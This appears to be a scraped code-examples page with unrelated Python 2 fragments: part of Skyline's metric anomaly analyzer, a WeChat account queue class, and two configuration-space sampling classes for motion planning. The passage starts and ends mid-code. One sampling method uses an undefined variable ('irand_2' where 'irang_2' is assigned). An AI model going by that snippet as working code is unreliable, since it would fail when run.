          anomalous.\n
        * If anomalous add it to the :obj:`self.anomalous_metrics` list\n
        * Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q` queue\n

        Add keys and values to the queue so the parent process can collate for:\n
        * :py:obj:`self.anomaly_breakdown_q`
        * :py:obj:`self.exceptions_q`
        """

        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(
            ceil(
                float(len(unique_metrics)) /
                float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)
        # assigned_keys = range(300, 310)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            # logger.info('analysing %s' % metric_name)

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(
                    timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE,
                                                    '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

            # It could have been deleted by the Roomba
            except TypeError:
                # logger.error('TypeError analysing %s' % metric_name)
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                # logger.error('TooShort analysing %s' % metric_name)
                exceptions['TooShort'] += 1
            except Stale:
                # logger.error('Stale analysing %s' % metric_name)
                exceptions['Stale'] += 1
            except Boring:
                # logger.error('Boring analysing %s' % metric_name)
                exceptions['Boring'] += 1
            except:
                # logger.error('Other analysing %s' % metric_name)
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        Called when the process intializes.

        Determine if Redis is up and discover the number of `unique metrics`.

        Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
        and assign each process a set of metrics to analyse for anomalies.

        Wait for the processes to finish.

        Process the Determine whether if any anomalous metrics require:\n
        * alerting on (and set `EXPIRATION_TIME` key in Redis for alert).\n
        * feeding to another module e.g. mirage.

        Populated the webapp json the anomalous_metrics details.

        Log the details about the run to the skyline log.

        Send skyline.analyzer metrics to `GRAPHITE_HOST`,
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' %
                             skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error(
                'error - bin/%s.d log management seems to have failed, continuing'
                % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' %
                             skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            if python_version == 2:
                os.makedirs(settings.SKYLINE_TMP_DIR, 0750)
            if python_version == 3:
                os.makedirs(settings.SKYLINE_TMP_DIR, mode=0o750)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error(
                    'skyline can\'t connect to redis at socket path %s' %
                    settings.REDIS_SOCKET_PATH)
                sleep(10)
                # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
                if settings.REDIS_PASSWORD:
                    self.redis_conn = StrictRedis(
                        password=settings.REDIS_PASSWORD,
                        unix_socket_path=settings.REDIS_SOCKET_PATH)
                else:
                    self.redis_conn = StrictRedis(
                        unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(
                self.redis_conn.smembers(settings.FULL_NAMESPACE +
                                         'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info(
                    'no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather that multiprocessing.Value to enable metrics for
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                # with open(algorithm_count_file, 'a') as f:
                with open(algorithm_count_file, 'w') as f:
                    pass
                with open(algorithm_timings_file, 'w') as f:
                    pass

            # Spawn processes
            pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info(
                        'WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' %
                            (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds
            p_starts = time()
            while time() - p_starts <= 180:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info(
                        '%s :: %s spin_process/es completed in %.2f seconds' %
                        (skyline_app, str(
                            settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info(
                    '%s :: timed out, killing all spin_process processes' %
                    (skyline_app))
                for p in pids:
                    p.terminate()
                    # p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Push to panorama
#            if len(self.panorama_anomalous_metrics) > 0:
#                logger.info('to do - push to panorama')

# Push to crucible
#            if len(self.crucible_anomalous_metrics) > 0:
#                logger.info('to do - push to crucible')

# Write anomalous_metrics to static webapp directory

# Using count files rather that multiprocessing.Value to enable metrics for
# metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                try:
                    algorithm_count_array = []
                    with open(algorithm_count_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace(
                                "'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_count_array.append(float_value)
                except:
                    algorithm_count_array = False

                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info('algorithm run count - %s run %s times' %
                            (algorithm, str(number_of_times_algorithm_run)))
                if number_of_times_algorithm_run == 0:
                    continue

                try:
                    algorithm_timings_array = []
                    with open(algorithm_timings_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace(
                                "'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_timings_array.append(float_value)
                except:
                    algorithm_timings_array = False

                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info('algorithm timings count - %s has %s timings' %
                            (algorithm, str(number_of_algorithm_timings)))

                if number_of_algorithm_timings == 0:
                    continue

                try:
                    _sum_of_algorithm_timings = sum(algorithm_timings_array)
                except:
                    logger.error("sum error: " + traceback.format_exc())
                    _sum_of_algorithm_timings = round(0.0, 6)
                    logger.error('error - sum_of_algorithm_timings - %s' %
                                 (algorithm))
                    continue

                sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6)
                # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings))

                try:
                    _median_algorithm_timing = determine_median(
                        algorithm_timings_array)
                except:
                    _median_algorithm_timing = round(0.0, 6)
                    logger.error('error - _median_algorithm_timing - %s' %
                                 (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)
                # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing))

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' %
                    (algorithm, sum_of_algorithm_timings,
                     median_algorithm_timing))
                send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run'
                self.send_graphite_metric(send_mertic_name,
                                          '%d' % number_of_algorithm_timings)
                send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time'
                self.send_graphite_metric(send_mertic_name,
                                          '%.6f' % sum_of_algorithm_timings)
                send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time'
                self.send_graphite_metric(send_mertic_name,
                                          '%.6f' % median_algorithm_timing)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' %
                        (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' %
                        len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('run_time', '%.2f' % (time() - now))
            self.send_graphite_metric(
                'total_analyzed',
                '%.2f' % (len(unique_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('total_anomalies',
                                      '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('total_metrics',
                                      '%d' % len(unique_metrics))
            for key, value in exceptions.items():
                send_metric = 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'anomaly_breakdown.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE +
                                             settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('duration', '%.2f' % time_human)
                self.send_graphite_metric('projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # if time() - now < 5:
            #    logger.info('sleeping due to low run time...')
            #    sleep(10)
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340)
            # Etsy's original if this was a value of 5 seconds which does
            # not make skyline Analyzer very efficient in terms of installations
            # where 100s of 1000s of metrics are being analyzed.  This lead to
            # Analyzer running over several metrics multiple time in a minute
            # and always working.  Therefore this was changed from if you took
            # less than 5 seconds to run only then sleep.  This behaviour
            # resulted in Analyzer analysing a few 1000 metrics in 9 seconds and
            # then doing it again and again in a single minute.  Therefore the
            # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to
            # self optimise in cases where skyline is NOT deployed to analyze
            # 100s of 1000s of metrics.  This relates to optimising performance
            # for any deployments in the few 1000s and 60 second resolution
            # area, e.g. smaller and local deployments.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                # sleep_for = 60
                logger.info(
                    'sleeping for %.2f seconds due to low run time...' %
                    sleep_for)
                sleep(sleep_for)
Ejemplo n.º 51
0
class Queue_server(object):
    
    '''
                 初始话公众号队列
     @param Tuple wx_lists 公众号列表
    '''
    def __init__(self ,wx_lists=()):
        self.__queue = Manager().Queue(-1)
        self.init_wx_lists(wx_lists)
        self.__fail_list = Manager().list()
    '''
                 初始话公众号队列
     @param Tuple wx_lists 公众号列表
    '''      
    def init_wx_lists(self ,wx_lists=()):
        for wx in wx_lists:
            self.put(wx)
    '''
                 添加元素
     @param mixed value 要添加的元素
    '''
    def put(self ,value):
        self.__queue.put(value)
    
    '''
                 弹出元素
     @return mixed       
    '''
    def get(self):
        if not self.empty():
            return self.__queue.get()
        return False
    
    '''
                 获取队列
     @return mixed       
    '''
    def get_wx_lists_queue(self):
        return self.__queue
    
    '''
                             获取队列大小
        @return int
    '''
    def get_size(self):
        return self.__queue.qsize()
    
    '''
                             队列是否为空
        @return bool
    '''
    def empty(self):
        return self.__queue.empty()
    
    '''
                             添加失败数据
        @param tuple wx_data 公众号信息
        @return bool
    '''     
    def put_fail_wx(self , wx_data):
        self.__fail_list.append(wx_data)
    
    '''
                             打印失败列表
    '''    
    def print_fail_list(self ,flush=None):
        if len(self.__fail_list) > 0 :
            for fail in self.__fail_list:
                self.put(fail)
                print 'the fail wx : {0}' . format(fail)
            if not flush:
                self.__fail_list = Manager().list()
        elif flush:
            print 'all success'
            
    #判断是否有错
    def is_have_failed(self):
        #判断是否有失败的公众号重新加入队列中
        return not self.empty()
class SampleManager:
    def __init__( self, CSpace ):
        self.mCSpace = CSpace;
        self.mCollisionMgr = CSpace.mCollisionMgr;
        self.mDistSamples = Manager().list();
        self.mFreeSamples = [];
        self.mObstSamples = [];
        self.g_failTimes = Value( 'i', 0 );
        
        
    def simpleSample(self, num):
        """randomly sample the world. save all samples"""
        samp = [];
        sampCount = 0;
        for i in range( 0, num ):
            irand_1 = randrange(0, self.mCSpace.mScaledWidth);
            irang_2 = randrange(0, self.mCSpace.mScaledHeight);
            alpha, phi = self.mCSpace.map2UnscaledSpace( irand_1, irand_2 );
            if not self.mCollisionMgr.ifCollide( (alpha, phi) ):
                self.mFreeSamples += [(irand_1, irang_2)];
            else:
                self.mObstSamples += [(irand_1, irang_2)];
        pass;
    
    def sampleFree(self, num):
        """Sample free space only, return num samples"""
        freeSamp = [];
        freeSampCount = 0;
        while( freeSampCount < num ):
            irand_1 = randrange(0, self.mCSpace.mScaledWidth);
            irang_2 = randrange(0, self.mCSpace.mScaledHeight);
            alpha, phi = self.mCSpace.map2UnscaledSpace( irand_1, irand_2 );
            if not self.mCollisionMgr.ifCollide( (alpha, phi) ):
                freeSamp += [(irand_1, irang_2)];
                freeSampCount += 1;
        self.mFreeSamples = freeSamp;
        print "Finished sampling free space, got {0} samples!".format( len(freeSamp) );
        return freeSamp;
    
    #def sampleNonVisArea( self, num ):
    #	"""After sampling many configurations with distance info. 
    #	There is still space not covered by those (hyper-)spheres.
    #	This method samples in the non-visiable area, and get num samples"""
    #	if len(self.mDistSamples) == 0:
    #		raise Exception( "Please sample (hyper)spheres in configuration space first." );

    #	samples = [];
    #	sampCount = 0;
    #	while( sampCount < num ):
    #		irand_1 = randrange(0, self.mCSpace.mScaledWidth);
    #		irang_2 = randrange(0, self.mCSpace.mScaledHeight);
    #		newSamp = ( irand_1, irang_2 );
    #		newSampValid = True;
    #		for distSamp in self.mDistSamples:
    #			if distSamp.isInside( (newSamp[0], newSamp[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
    #				newSampValid = False;
    #				break;
    #		if newSampValid:
    #			samples += [newSamp];
    #			sampCount += 1;

    #	return samples;

    def getARandomFreeSample(self, num):
        """Randomly sample the space and return a free sample (with distance info).
         The sample is not inside of any other sphere. Also, this method will not automatically 
         add the new sample to self.mDistSamples list.
         @param num: fail time. If failed to find such a sample num times, return null"""
        failTime=0;
        while( failTime < num ):
            rnd1 = randrange(0,self.mCSpace.mScaledWidth);
            rnd2 = randrange(0,self.mCSpace.mScaledHeight);
            alpha, phi = self.mCSpace.map2UnscaledSpace( rnd1, rnd2 );
            if( self.mCollisionMgr.ifCollide( (alpha, phi) ) ):
                continue;

            newSamp = True;
            for sample in self.mDistSamples:
                if sample.isInside( (rnd1, rnd2), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
                    newSamp = False;
                    failTime += 1
                    break;
            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd1, rnd2, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(72);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample(rnd1, rnd2, dist);
                    #(self.mDistSamples).append( newDistSamp );
                    print "failed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;

    ###=======================================================================================
    ###=== Strategy 2: Randomly sample one sphere, then sample from the boundary
    ###===         Then keep sampling the new boundary of the set of spheres
    def distSampleOneThread( self, num, imgSurface=None ):
        self.mDistSamples = [];
        boundaryQueue = Queue();
        bndSphDict = defaultdict();

        randFreeSamp = 1234;
        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num );
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            self.drawDistSample(imgSurface, (randFreeSamp.mSample[0],randFreeSamp.mSample[1]), randFreeSamp.mRadius);
            bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                bndSphDict[bndConfig] = randFreeSamp;
                boundaryQueue.put( bndConfig );				# put the boundary config to the queue.

            while( not boundaryQueue.empty() ):
                #print "Size of dist samples {0}".format( len( self.mDistSamples ) );
     #           if( len(self.mDistSamples) % 100 == 0 ):
                    #randFreeSamp = self.getARandomFreeSample( num );
                    #if( randFreeSamp == None ):
                    #	return;
                    #(self.mDistSamples).append( randFreeSamp )
                    #bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);		# get the boundary configs
                    #for bndConfig in bounds:
                    #	#if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                    #	bndSphDict[bndConfig] = newDistSamp;
                    #	boundaryQueue.put( bndConfig );				# put the boundary config to the queue.


                bnd = boundaryQueue.get();							# get a new boundary  
                newSamp = True;
                if self.mCollisionMgr.ifCollide((bnd[0], bnd[1])):
                    continue;
                for sample in self.mDistSamples:
                    if sample.isInside( (bnd[0], bnd[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ): #####################################################################################================================ Locally Sensetive Hash
                        # check if within any spheres, not including the sphere that the boundary config belongs to.
                        newSamp = False;
                        break;

                if newSamp:
                    # randomly shoot rays to get the nearest distance to obstacles
                    rayShooter = RayShooter( bnd[0], bnd[1], self.mCollisionMgr, self.mCSpace );	# Shot ray
                    dist = rayShooter.randShoot(72);					# Get the distance to obstacles
                    if (dist) >= 2.0:	    					# if not too close to obstacles
                        newDistSamp = DistSample(bnd[0], bnd[1], dist)	# construct a new dist sample
                        self.mDistSamples.append( newDistSamp );				# add to our dist sample set
                        self.drawDistSample( imgSurface, (newDistSamp.mSample[0], newDistSamp.mSample[1]), newDistSamp.mRadius );
                        bounds = newDistSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);		# get the boundary configs
                        #for boundary in boundaryQueue:
                        #    if newDistSamp.isInside( (boundary[0],boundary[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
                        #        pass;
                        for bndConfig in bounds:
                            #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                            bndSphDict[bndConfig] = newDistSamp;
                            boundaryQueue.put( bndConfig );				# put the boundary config to the queue.

    def renderAllDistSamples(self, ImgSurface):
        """Render distance sample to image"""
        print "render {0} dist samples to the image".format( len(self.mDistSamples) );
        freeColor = ( 0, 0, 250 );
        obstColor = ( 200, 0, 100 );
        for samp in self.mDistSamples:
            if samp.mRadius > 0: # Free sample
                self.drawDistSample( ImgSurface, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), freeColor );
                #pygame.draw.circle( ImgSurface, freeColor, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), 1 );
            else:
                self.drawDistSample( ImgSurface, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), obstColor );
                #pygame.draw.circle( ImgSurface, obstColor, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), 1 );

    def drawDistSample(self, imgsurf, origin, radius, color=(0,0,250)):
        if(imgsurf is not None and radius <= 1000000000 and radius > 0):
                pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])), int(radius), 1 );
                if( origin[0]-radius<0 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0])+900,int(origin[1])), int(radius), 1 );
                if( origin[1]-radius<0 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])+900), int(radius), 1 );
                if( origin[0]+radius>900 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0])-900,int(origin[1])), int(radius), 1 );
                if( origin[1]+radius>900 ):
                    pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])-900), int(radius), 1 );

                for event in pygame.event.get():
                    pass;
                pygame.display.update();

    def writeSamplesToFile( self, filename ):
        file2write = open( filename, 'w' );
        formattedData = ""
        for vector in self.mDistSamples:
            formattedData += "{0}\t{1}\t{2}\n".format( vector.mSample[0], vector.mSample[1], vector.mRadius )
            pass
        
        file2write.write( formattedData );
        file2write.close();

    def loadDistSamplesFromFile( self, filename ):
        file2read = open( filename, 'r' );
        self.mDistSamples = [];
        for line in file2read:
            strDistSamp = line;
            info = strDistSamp.split( '\t' );
            distSamp = DistSample( float(info[0]), float(info[1]), float(info[2]));
            if( distSamp.mRadius > 2 ):
                self.mDistSamples += [ distSamp ];
class SampleManager:
    def __init__( self, CSpace ):
        self.mCSpace = CSpace;
        self.mCollisionMgr = CSpace.mCollisionMgr;
        self.mDistSamples = Manager().list();
        self.mFreeSamples = [];
        self.mObstSamples = [];
        self.g_failTimes = Value( 'i', 0 );
        unitLens = [100] * len( self.mCSpace.mMaxDimLens )
        self.mSpacePartition = SpacePartition( self.mCSpace.mMaxDimLens, unitLens );

    def getFreeSamples( self, num, dim, maxDimLens ):
        """get num number of free samples in C-Space"""
        size = 0; 
        while size < num:
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
                size += 1;

    def randomSample( self, num, dim, maxDimLens ):
        for i in range( 0, num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #config = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
            else:
                self.mObstSamples.append( rnd );
     
    def getARandomFreeSample(self, num, maxDimLens, dim):
        """Randomly sample the space and return a free sample (with distance info).
         The sample is not inside of any other sphere. Also, this method will not automatically 
         add the new sample to self.mDistSamples list.
         @param num: fail time. If failed to find such a sample num times, return null"""
        failTime=0;
        while( failTime < num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( self.mCollisionMgr.ifCollide( rnd ) ):
                continue;

            newSamp = True;

            grid = self.mSpacePartition.getContainingGrid( rnd );
            for sphere in grid.mContainer:
                if sphere.isInside( rnd ):
                    newSamp = False;
                    failTime += 1
                    break;

            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(50 * 2);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample( rnd, dist );
                    print "------>\tfailed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;
           

    def distSampleUsingObstSurfSamps( self, num, maxDimLens ):
        """@param num: failure time to sample a new configuration randomly"""

        self.randomSample( 100, len(maxDimLens), maxDimLens );
        searcher = ObstSurfSearcher(self.mCollisionMgr, self.mCSpace);
        searcher.searchObstSurfConfigs( self.mFreeSamples, self.mObstSamples, 2 );

        self.mDistSamples = [];
        boundaryQueue = [];
        bndSphDict = defaultdict();
        randFreeSamp = 1234;

        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num, maxDimLens, 2);
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            bounds = randFreeSamp.getBoundaryConfigs( maxDimLens );

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:			# put the boundconfig-sphere relation to the dictionary
                bndSphDict[str(bndConfig)] = randFreeSamp;
                boundaryQueue.append( bndConfig );				# put the boundary config to the queue.

            while( len( boundaryQueue) != 0 ):
                bnd = boundaryQueue[0];							# get a new boundary
                del boundaryQueue[0]
                newSamp = True;
                bndUnscaled = self.mCSpace.map2UnscaledSpace( bnd );
                if self.mCollisionMgr.ifCollide( bndUnscaled ):
                    continue;

                grid = self.mSpacePartition.getContainingGrid( bnd );
                for sphere in grid.mContainer:
                    if sphere.isInside( bnd, maxDimLens ):
                        newSamp = False;
                        break;

                if newSamp:
                    # get the nearest distance to obstacles
                    dist, neighbor = searcher.getNearest( bnd );              # Get the distance to obstacles
                    if (dist) >= 30.0:	    					 # if not too close to obstacles
                        newDistSamp = DistSample(bnd, dist)	# construct a new dist sample
                        print "{0}  R: {1}".format( bnd, dist );
                        self.mDistSamples.append( newDistSamp );				# add to our dist sample set
                        self.mSpacePartition.addSphere( newDistSamp );         ############# Add new sphere to space partition
                        #if( len(self.mDistSamples) >= 800 ):
                        #    return;
                        bounds = newDistSamp.getBoundaryConfigs(maxDimLens);		# get the boundary configs
                        for bndConfig in bounds:
                            #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                            bndSphDict[str(bndConfig)] = newDistSamp;
                            boundaryQueue.append( bndConfig );				# put the boundary config to the queue.
                        
                        ###########################=========================================================
                        if len(self.mDistSamples)%30 == 0:
                            print "------------ FRESH -------------"
                            idx = 0;
                            for bnd in boundaryQueue:
                                grid = self.mSpacePartition.getContainingGrid( bnd );
                                for sphere in grid.mContainer:
                                    if sphere.isInside( bnd, maxDimLens ):
                                        del boundaryQueue[idx];
                                        idx -= 1;
                                idx += 1;

                        #    for sphere in self.mDistSamples:
                        #        boundaryQueue = [x for x in boundaryQueue if( not sphere.isInside(x, maxDimLens)) ]
                        ###########################=========================================================

                        print "\t\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue));



    def distSampleOneThread( self, num, maxDimLens ):
        """@param num: failure time to sample a new configuration randomly"""

        self.mDistSamples = [];
        boundaryQueue = [];
        bndSphDict = defaultdict();

        randFreeSamp = 1234;
        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num, maxDimLens, len(maxDimLens) );
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            bounds = randFreeSamp.getBoundaryConfigs( maxDimLens );

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:			# put the boundconfig-sphere relation to the dictionary
                bndSphDict[str(bndConfig)] = randFreeSamp;
                boundaryQueue.append( bndConfig );				# put the boundary config to the queue.

            while( len( boundaryQueue) != 0 ):
                bnd = boundaryQueue[0];							# get a new boundary
                del boundaryQueue[0]
                newSamp = True;
                if self.mCollisionMgr.ifCollide( bnd ):
                    continue;
                for sample in self.mDistSamples:
                    if sample.isInside( bnd, maxDimLens ): #####################################################################################================================ Locally Sensetive Hash
                        # check if within any spheres, not including the sphere that the boundary config belongs to.
                        newSamp = False;
                        break;

                if newSamp:
                    # randomly shoot rays to get the nearest distance to obstacles
                    rayShooter = RayShooter( bnd, self.mCollisionMgr, self.mCSpace );	# Shot ray
                    dim = len(maxDimLens);
                    dist = rayShooter.randShoot(50*(dim-1));					# Get the distance to obstacles
                    if (dist) >= 40.0:	    					# if not too close to obstacles
                        newDistSamp = DistSample(bnd, dist)	# construct a new dist sample
                        print "{0}  R: {1}".format( bnd, dist );
                        self.mDistSamples.append( newDistSamp );				# add to our dist sample set
                        bounds = newDistSamp.getBoundaryConfigs(maxDimLens);		# get the boundary configs
                        if len(self.mDistSamples) == 100:
                            return;
                        for bndConfig in bounds:
